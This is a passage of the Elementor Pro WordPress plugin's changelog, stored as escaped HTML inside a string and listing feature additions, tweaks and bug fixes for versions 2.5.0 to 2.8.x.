href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9864\\\">#9864<\\/a>)<\\/li>\\n<li>Fix: Added compatibility for Button widget placed inside Swiper carousel (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/broken-buttons-since-elementor-2-8\\/\\\">Topic<\\/a>)<\\/li>\\n<li>Fix: Avoid empty spaces in Post info widget<\\/li>\\n<li>Tweak: Always show "Custom label" control in Login widget<\\/li>\\n<li>Fix: Nav Menu item typography selector in Nav Menu widget<\\/li>\\n<li>Fix: Facebook Like Button widget causes flickering<\\/li>\\n<li>Fix: WooCommerce mini-cart behaviour when using <code>plain<\\/code> permalinks format<\\/li>\\n<li>Fix: Avoid running Popup triggers when set without conditions<\\/li>\\n<li>Fix: Removed "Date" query from Products widget<\\/li>\\n<li>Fix: Slides widget when used as a Shortcode and is hidden<\\/li>\\n<li>Fix: Custom URL being accessed on swipe in Media Carousel<\\/li>\\n<li>Fix: Media Carousel widget Cube effect glitch<\\/li>\\n<li>Fix: Lightbox shows images from multiple Gallery widgets in the same page<\\/li>\\n<li>Fix: Image <code>alt<\\/code> Text not displayed on overlay in Gallery widget<\\/li>\\n<li>Fix: Gallery widget not visible in Posts widget Full Content skin<\\/li>\\n<li>Fix: WooCommerce mini-cart remove unnecessary hooks registration when WooCommerce integration set to <code>Disable<\\/code><\\/li>\\n<li>Fix: Slides widget button wrapping breaks in mobile view<\\/li>\\n<li>Fix: Dynamic capabilities with the Reviews widget<\\/li>\\n<li>Fix: Disabling autoplay doesn\'t work in Slides widget<\\/li>\\n<li>Fix: Posts widget Full Content skin not working on Single template<\\/li>\\n<li>Fix: Autocomplete not working for "By Author" condition in Display Conditions screen<\\/li>\\n<li>Fix: Posts widget alignment issue<\\/li>\\n<li>Fix: Product Variations Clear button not working in edge cases<\\/li>\\n<li>Fix: Styling issues in Form widget submit button<\\/li>\\n<\\/ul>\\n<h4>2.7.3 - 2019-10-28<\\/h4>\\n<ul>\\n<li>Tweak: Added RTL support to Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9213\\\">#9213<\\/a>)<\\/li>\\n<li>Tweak: Added Custom Icons compatibility for WordPress 5.3<\\/li>\\n<li>Fix: Missing template function declaration causes fatal error in WC mini-cart widget<\\/li>\\n<li>Fix: Pause on hover doesn\'t work in Carousel widgets<\\/li>\\n<li>Fix: Link-actions conflict with <code>?action=<\\/code> parameter in the URL<\\/li>\\n<li>Fix: Lightbox navigation not working in Gallery widget Single mode<\\/li>\\n<li>Fix: Ken burns effect not working on the 1st slide if Infinite Loop option is turned off in Carousel widgets<\\/li>\\n<li>Fix: Popup Advanced Rules detects internal links as external if current URL starts with <code>www<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.7.2 - 2019-10-06<\\/h4>\\n<ul>\\n<li>Fix: Slide Overlay not working when applying Ken burns effect in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9209\\\">#9209<\\/a>)<\\/li>\\n<li>Fix: Content width glitch in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Horizontal Alignment not working when applying custom style per slide in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Missing semicolon in Custom Fonts <code>font-display<\\/code> CSS<\\/li>\\n<\\/ul>\\n<h4>2.7.1 - 2019-09-26<\\/h4>\\n<ul>\\n<li>Fix: Background Overlay layer is over the slide content in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9180\\\">#9180<\\/a>)<\\/li>\\n<li>Fix: Duplicate images under "All" filter in Multiple Gallery<\\/li>\\n<\\/ul>\\n<h4>2.7.0 - 2019-09-24<\\/h4>\\n<ul>\\n<li>New: Enhanced Galleries widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1898\\\">#1898<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/3103\\\">#3103<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4279\\\">#4279<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7631\\\">#7631<\\/a>)<\\/li>\\n<li>New: Dynamic Number (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5952\\\">#5952<\\/a>)<\\/li>\\n<li>New: Full content skin for Posts and Archive-posts widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4617\\\">#4617<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic number capability to Price List, Price Table, Counter, Star Rating, Progress Bar widgets<\\/li>\\n<li>Tweak: Added tags support to forms Mailchimp action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5418\\\">#5418<\\/a>)<\\/li>\\n<li>Tweak: User Profile Picture Dynamic Tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7947\\\">#7947<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8740\\\">#8740<\\/a>)<\\/li>\\n<li>Tweak: Added <code>font-display<\\/code> support to custom fonts (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5993\\\">#5993<\\/a>, <a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-custom-fonts-font-display-support\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added Text Shadow control to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8800\\\">#8800<\\/a>)<\\/li>\\n<li>Tweak: Added Re-subscribe support to MailerLite (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8799\\\">#8799<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Facebook Embed widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9030\\\">#9030<\\/a>)<\\/li>\\n<li>Tweak: Use <code>swiper.js<\\/code> instead of <code>slick.js<\\/code> in Slides widget (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-2-7-moving-sliders-from-slick-to-swiper\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/before_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor_pro\\/search_form\\/after_input<\\/code> action hook to Search Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5598\\\">#5598<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic support for Custom field key (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7789\\\">#7789<\\/a>)<\\/li>\\n<li>Tweak: Increased expired license notice bar frequency<\\/li>\\n<li>Tweak: Changed the icon name of Slides widget<\\/li>\\n<li>Tweak: Added designated Finder\'s Icons for Custom icons & Custom fonts<\\/li>\\n<li>Tweak: Use Ken Burns Effect as an external module<\\/li>\\n<li>Tweak: Remove Fontello conflicting CSS on import to Custom Icons sets<\\/li>\\n<li>Tweak: Editor Panel UI tweaks<\\/li>\\n<li>Tweak: Added DOM events on Popup show\\/hide (<a href=\\\"https:\\/\\/developers.elementor.com\\/elementor-pro-2-7-popup-events\\/\\\">Developers Blog Post<\\/a>)<\\/li>\\n<li>Tweak: Added option to change the variations field width in Add to Cart widget<\\/li>\\n<li>Tweak: Use select control instead of select2 in Menu Cart widget<\\/li>\\n<li>Tweak: Added conditions to the tabs instead of to each control in Share Buttons widget<\\/li>\\n<li>Tweak: Added Typography controls to HTML field in Forms widget<\\/li>\\n<li>Tweak: Allow edit selected Font file in Custom Font<\\/li>\\n<li>Tweak: Changed reCAPTCHA v3 error message<\\/li>\\n<li>Tweak: Remove the "Save as Global" option on Global widget context menu<\\/li>\\n<li>Fix: Corrected selector for <code>removeControlSpinner()<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8790\\\">#8790<\\/a>)<\\/li>\\n<li>Fix: Slides widget navigation icons misplacement (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8533\\\">#8533<\\/a>)<\\/li>\\n<li>Fix: Horizontal Scrollbar when Slider widget is set to Full Width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8527\\\">#8527<\\/a>)<\\/li>\\n<li>Fix: Inconsistent behavior when "Infinite Loop" enabled with "Autoplay" in Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6726\\\">#6726<\\/a>)<\\/li>\\n<li>Fix: Ken Burns effect on Chrome transition glitches (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1671\\\">#1671<\\/a>)<\\/li>\\n<li>Fix: Nothing found message shows up inside the columns set in Posts Archive widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7347\\\">#7347<\\/a>)<\\/li>\\n<li>Fix: Responsive UI glitch in Popup Conditions modal tabs<\\/li>\\n<li>Fix: Removed unnecessary divider in Call to Action widget<\\/li>\\n<li>Fix: Custom Add To Cart * button style (size, position and background color) when <code>quantity<\\/code> is enabled.<\\/li>\\n<li>Fix: Add support for Document\\/PageBase in Theme Builder (Core >=2.7.0)<\\/li>\\n<li>Fix: Ampersand character breaks email link in Share Buttons widget<\\/li>\\n<li>Fix: Correct custom font attachment <code>mime-type<\\/code> to show uploaded Custom Fonts<\\/li>\\n<li>Fix: Mini-Cart not refreshing in Menu Cart widget<\\/li>\\n<li>Fix: Cart drawer not working when WC Subscriptions plugin is activated<\\/li>\\n<li>Fix: Querying CPT with custom taxonomies does not show the taxonomies before saving<\\/li>\\n<li>Fix: Double rendering on change caused console error in Theme Builder\'s conditions screen<\\/li>\\n<li>Fix: Translations and Strings in Share Buttons widget<\\/li>\\n<li>Fix: Avoid using offset if the source is Manual selection in Query Control<\\/li>\\n<li>Fix: Form being submitted although reCAPTCHA v3 validation failed in Forms widget<\\/li>\\n<\\/ul>\\n<h4>2.6.5 - 2019-08-26<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Button style not working when <code>quantity<\\/code> is enabled in Custom Add To Cart widget<\\/li>\\n<li>Fix: Updated minified JS file fixed WhatsApp base URL in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>2.6.4 - 2019-08-21<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.7<\\/li>\\n<li>Fix: Changed WhatsApp base URL in Share Buttons widget for cross-device compatibility<\\/li>\\n<li>Fix: Random slides order after several clicks on pagination in Testimonial Carousel widget<\\/li>\\n<\\/ul>\\n<h4>2.6.3 - 2019-08-18<\\/h4>\\n<ul>\\n<li>Fix: Core version rollback to <code>>2.6.0<\\/code> causes a fatal error<\\/li>\\n<li>Fix: Duplicate images when slideshow skin is selected in Media Carousel lightbox<\\/li>\\n<li>Fix: Default bottom margin added to reCAPTCHA V3 badge<\\/li>\\n<li>Fix: Input glitch in reCAPTCHA V3 threshold settings<\\/li>\\n<\\/ul>\\n<h4>2.6.2 - 2019-07-30<\\/h4>\\n<ul>\\n<li>Tweak: Better accessibility support in Search Form widget<\\/li>\\n<li>Fix: UI glitched in Popup publish screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8616\\\">#8616<\\/a>)<\\/li>\\n<li>Fix: "Child of Term" and "Any child of term" conditions (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8695\\\">#8695<\\/a>)<\\/li>\\n<li>Fix: Restored <code>library_widget_templates<\\/code> action hook for 3rd party compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8687\\\">#8687<\\/a>)<\\/li>\\n<li>Fix: Twitter Icon missing in Blockquote widget<\\/li>\\n<li>Fix: Form reCAPTCHA v3 badge position not working<\\/li>\\n<li>Fix: Renewal notice bar appears in wrong situations<\\/li>\\n<li>Fix: Draft Icon Set loads empty Icon Library<\\/li>\\n<\\/ul>\\n<h4>2.6.1 - 2019-07-24<\\/h4>\\n<ul>\\n<li>Fix: Query Control autocomplete not retrieving results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8672\\\">#8672<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8661\\\">#8661<\\/a>)<\\/li>\\n<li>Fix: Price Table features section not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8660\\\">#8660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.6.0 - 2019-07-23<\\/h4>\\n<ul>\\n<li>New: Introducing Custom Icon sets - including Fontello, IcoMoon and Fontastic support (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/110\\\">#110<\\/a>)<\\/li>\\n<li>New: Added Font Awesome 5 Pro integration including 5,300+ icons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4430\\\">#4430<\\/a>)<\\/li>\\n<li>New: Added reCAPTCHA v3 integration to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8213\\\">#8213<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6039\\\">#6039<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7165\\\">#7165<\\/a>)<\\/li>\\n<li>Tweak: Added Exit Animation for Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7063\\\">#7063<\\/a>)<\\/li>\\n<li>Tweak: Added ACF Dynamic tag support for archive pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5147\\\">#5147<\\/a>)<\\/li>\\n<li>Tweak: Added Navigator Indicators for Custom CSS & Motion Effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2180\\\">#2180<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities for Form Redirect action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7552\\\">#7552<\\/a>)<\\/li>\\n<li>Tweak: Added Logged In Message styling options for Login widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7928\\\">#7928<\\/a>)<\\/li>\\n<li>Tweak: Added <code>none<\\/code> breakpoint option to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7916\\\">#7916<\\/a>)<\\/li>\\n<li>Tweak: Added option to place Post Terms dynamic tag without links (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8366\\\">#8366<\\/a>)<\\/li>\\n<li>Tweak: Added <code>elementor\\/query\\/query_results<\\/code> hook to Query Control to allow full control over results (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7912\\\">#7912<\\/a>)<\\/li>\\n<li>Tweak: Allow choosing Heading HTML tag in Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8090\\\">#8090<\\/a>)<\\/li>\\n<li>Tweak: Show popup on dynamic click even when <code>Avoid Multiple Popups<\\/code> option is selected (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8189\\\">#8189<\\/a>)<\\/li>\\n<li>Tweak: Added condition option to all of archive child pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8256\\\">#8256<\\/a>)<\\/li>\\n<li>Tweak: Added <code>Effects Relative To<\\/code> control to Scrolling Effects<\\/li>\\n<li>Tweak: Allow shortcodes in HTML Form field<\\/li>\\n<li>Tweak: Removed donReach integration from Share Buttons widget due to service inconsistent stability<\\/li>\\n<li>Tweak: Changed MailChimp <code>List<\\/code> label to <code>Audience<\\/code><\\/li>\\n<li>Tweak: Improved Entrance and Exit animation behavior in Popup<\\/li>\\n<li>Tweak: Added <code>Deprecated Notice<\\/code> control to <code>Archive Products<\\/code> and <code>Woo Products<\\/code> widgets<\\/li>\\n<li>Tweak: Added default dynamic title for archives in Theme Builder<\\/li>\\n<li>Tweak: Added condition to show <code>Centered Slides<\\/code> control in Media Carousel widget<\\/li>\\n<li>Tweak: Added notice bar in the Editor when the license is expired or not activated<\\/li>\\n<li>Tweak: Replaced <code>select<\\/code> control with <code>choose<\\/code> control in Price List widget<\\/li>\\n<li>Tweak: Removed Font Awesome 4 dependencies from the Editor<\\/li>\\n<li>Tweak: Minor styling tweaks in the Popup publish modal<\\/li>\\n<li>Tweak: Hide ordering form in Products widget on front page<\\/li>\\n<li>Tweak: Removed page title markup when \'Hide Title\' is active<\\/li>\\n<li>Tweak: Added style controls for HTML field in Form widget<\\/li>\\n<li>Fix: Form widget Date picker makes the Popup builder disappear (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7240\\\">#7240<\\/a>)<\\/li>\\n<li>Fix: Sticky element stop point stops working on viewport resize (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7884\\\">#7884<\\/a>)<\\/li>\\n<li>Fix: Copy-Paste style not pasting the Pointer option in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8497\\\">#8497<\\/a>)<\\/li>\\n<li>Fix: Missing Print icon in Share Buttons (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8506\\\">#8506<\\/a>)<\\/li>\\n<li>Fix: UI style glitch in Blockquote widget when viewing from iPad<\\/li>\\n<li>Deprecated: <code>DB::save_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<li>Deprecated: <code>DB::get_plain_editor()<\\/code> - Remove usage of this method (<a href=\\\"https:\\/\\/developers.elementor.com\\/v2-6-0-planned-deprecations\\/\\\">Deprecation Post<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.14 - 2019-07-14<\\/h4>\\n<ul>\\n<li>Fix: Better WC Related Product grid support to various themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8555\\\">#8555<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.13 - 2019-07-11<\\/h4>\\n<ul>\\n<li>Fix: Better WC grid support to various themes<\\/li>\\n<\\/ul>\\n<h4>2.5.12 - 2019-07-10<\\/h4>\\n<ul>\\n<li>Fix: Grid for WooCommerce Archive Product widget<\\/li>\\n<li>Fix: Remove redundant <code>whitespace<\\/code> CSS property causes style glitch in iPad<\\/li>\\n<li>Tweak: Added more compatibility for Elementor v2.6<\\/li>\\n<\\/ul>\\n<h4>2.5.11 - 2019-07-02<\\/h4>\\n<ul>\\n<li>Fix: Close icon missing from Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8460\\\">#8460<\\/a>)<\\/li>\\n<li>Fix: Elementor Pro v2.5.10 shows PHP notice regarding notice bar (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8461\\\">#8461<\\/a>)<\\/li>\\n<li>Fix: Fatal error when deleting used Pods fields (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8396\\\">#8396<\\/a>)<\\/li>\\n<li>Fix: Missing dropdown icon in conditions screen<\\/li>\\n<\\/ul>\\n<h4>2.5.10 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the upcoming release of Elementor v2.6<\\/li>\\n<li>Tweak: Error caused by empty Rows & Columns values in Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8261\\\">#8261<\\/a>)<\\/li>\\n<li>Fix: Do not unset <code>product<\\/code> CPT if it\'s not from WooCommerce (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8160\\\">#8160<\\/a>)<\\/li>\\n<li>Fix: Column Spacing not working in WooCommerce Archive Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8285\\\">#8285<\\/a>)<\\/li>\\n<li>Fix: Title styling not working in Products Categories widget<\\/li>\\n<li>Fix: Empty value in Dynamic Pods Gallery dropdown using Safari browser<\\/li>\\n<li>Fix: WooCommerce archives included in "All Archives" condition<\\/li>\\n<\\/ul>\\n<h4>2.5.9 - 2019-05-28<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>auto-confirm<\\/code> control from MailPoet to support new version of MailPoet<\\/li>\\n<li>Fix: Multiple Custom Fonts not rendered in the editor<\\/li>\\n<li>Fix: Products <code>sale<\\/code> query - handle exclude by manual selection.<\\/li>\\n<li>Fix: Product Categories grid row & column style<\\/li>\\n<li>Fix: Form integration AJAX cache override<\\/li>\\n<li>Fix: Removed redundant CSS on Canvas & Header-Footer page templates<\\/li>\\n<\\/ul>\\n<h4>2.5.8 - 2019-05-06<\\/h4>\\n<ul>\\n<li>Fix: Popup entrance animation not working in frontend<\\/li>\\n<li>Fix: Popup Exit Intent trigger activated multiple times<\\/li>\\n<\\/ul>\\n<h4>2.5.7 - 2019-05-05<\\/h4>\\n<ul>\\n<li>Fix: Embedded video keeps playing after a Popup is closed (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7875\\\">#7875<\\/a>)<\\/li>\\n<li>Fix: Maximum call stack size exceeded error in Safari (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7824\\\">#7824<\\/a>)<\\/li>\\n<li>Fix: Entrance animations not appearing on Popup reopen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7395\\\">#7395<\\/a>)<\\/li>\\n<li>Fix: WC variations select style glitch in several themes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8008\\\">#8008<\\/a>)<\\/li>\\n<li>Fix: Theme Builder taxonomy conditions not retrieving proper results in edge cases<\\/li>\\n<\\/ul>\\n<h4>2.5.6 - 2019-04-29<\\/h4>\\n<ul>\\n<li>Tweak: Removed <code>Shortcode<\\/code> dynamic from Image, Gallery and Media control<\\/li>\\n<li>Fix: Popup not inheriting entrance animation in responsive mode (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7809\\\">#7809<\\/a>)<\\/li>\\n<li>Fix: Terms autocomplete retrieves wrong results in Query Control<\\/li>\\n<li>Fix: Query Control Related by author glitches in edge cases<\\/li>\\n<li>Fix: Query Control using terms for Products widget<\\/li>\\n<li>Fix: Posts cards style glitch in small screens<\\/li>\\n<li>Fix: Display conditions delete icon missing in small screens<\\/li>\\n<li>Fix: Avoid rendering Menu Cart widget in WordPress native editor<\\/li>\\n<\\/ul>\\n<h4>2.5.5 - 2019-04-08<\\/h4>\\n<ul>\\n<li>Tweak: Allow text selection inside a Popup<\\/li>\\n<li>Fix: Added backwards compatibility for <code>tax_query<\\/code> in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7751\\\">#7751<\\/a>)<\\/li>\\n<li>Fix: Missing arguments for <code>widget_title<\\/code> filter (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7745\\\">#7745<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.4 - 2019-04-03<\\/h4>\\n<ul>\\n<li>Fix: Move Query from using <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<li>Fix: Offset manipulation hook removal in Query control<\\/li>\\n<li>Fix: Missing form field <code>ID<\\/code> in some edge cases (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7711\\\">#7711<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7660\\\">#7660<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.3 - 2019-03-31<\\/h4>\\n<ul>\\n<li>Tweak: Updated Google Calendar dynamic tag URL (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7673\\\">#7673<\\/a>)<\\/li>\\n<li>Fix: Missing form field names (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7651\\\">#7651<\\/a>)<\\/li>\\n<li>Fix: PHP 5.4 backward compatibility in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7633\\\">#7633<\\/a>)<\\/li>\\n<li>Fix: <code>products_deprecated<\\/code> Query Control module compatibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7654\\\">#7654<\\/a>)<\\/li>\\n<li>Fix: Changed query method from <code>term_id<\\/code> to <code>term_taxonomy_id<\\/code> (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7653\\\">#7653<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>2.5.2 - 2019-03-27<\\/h4>\\n<ul>\\n<li>Fix: Overwrite parent widget type in Global Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7632\\\">#7632<\\/a>)<\\/li>\\n<li>Fix: Avoid Duplicates option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7635\\\">#7635<\\/a>)<\\/li>\\n<li>Fix: Manual Selection option not working in Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7634\\\">#7634<\\/a>)<\\/li>\\n<li>Fix: Incorrect condition caused handlers issues inside popup<\\/li>\\n<\\/ul>\\n<h4>2.5.1 - 2019-03-26<\\/h4>\\n<ul>\\n<li>Fix: Query Control invalid call to deprecated action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7619\\\">#7619<\\/a>)<\\/li>\\n<li>Tweak: Renamed action hook from <code>elementor_pro\\/{$widget_name}\\/query\\/{$query_id}<\\/code> to <code>elementor\\/query\\/{$query_id}<\\/code><\\/li>\\n<li>Tweak: Renamed filter hook from <code>elementor_pro\\/query_control\\/get_query_args\\/current_query<\\/code> to <code>elementor\\/query\\/get_query_args\\/current_query<\\/code><\\/li>\\n<\\/ul>\\n<h4>2.5.0 - 2019-03-26<\\/h4>\\n<ul>\\n<li>New: Introducing Motion Effects including Scrolling & Mouse effects (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/72\\\">#72<\\/a>)<\\/li>\\n<li>New: Introducing Related Posts for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7306\\\">#7306<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7490\\\">#7490<\\/a>)<\\/li>\\n<li>New: Introducing Date query for Query Control<\\/li>\\n<li>New: Introducing Sticky Posts support for Query Control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2501\\\">#2501<\\/a>)<\\/li>\\n<li>Tweak: Added option to open a Popup by a custom selector (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6871\\\">#6871<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6876\\\">#6876<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Option to count when Popup is closed in "Show up to X times" Advanced Rule<\\/li>\\n<li>Tweak: Added full border radius control options inside Popup<\\/li>\\n<li>Tweak: Changed exit intent icon in Popups<\\/li>\\n<li>Tweak: Show only one popup in its own preview<\\/li>\\n<li>Tweak: Added responsive support to Popup entrance animation control<\\/li>\\n<li>Tweak: Conditions - Singular <code>All Pages<\\/code> string changed to <code>Pages<\\/code><\\/li>\\n<li>Tweak: Added form field shortcode support for Drip tags (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7000\\\">#7000<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Price List widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7258\\\">#7258<\\/a>)<\\/li>\\n<li>Tweak: Added Dynamic capabilities to Custom Attributes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6779\\\">#6779<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic capabilities to Flip Box widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6986\\\">#6986<\\/a>)<\\/li>\\n<li>Tweak: Decrease <code>z-index<\\/code> for Nav Menu (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6869\\\">#6869<\\/a>)<\\/li>\\n<li>Tweak: Changed "Scrolling Effects" section label to "Motion Effects"<\\/li>\\n<li>Tweak: Use filter <code>get_meta_viewport<\\/code> for header templates (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7043\\\">#7043<\\/a>)<\\/li>\\n<li>Tweak: use filterable <code>Util::get_public_post_types()<\\/code> in Theme Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/7172\\\">#7172<\\/a>)<\\/li>\\n<li>Tweak: Added Cloudflare rocket-loader support (<a 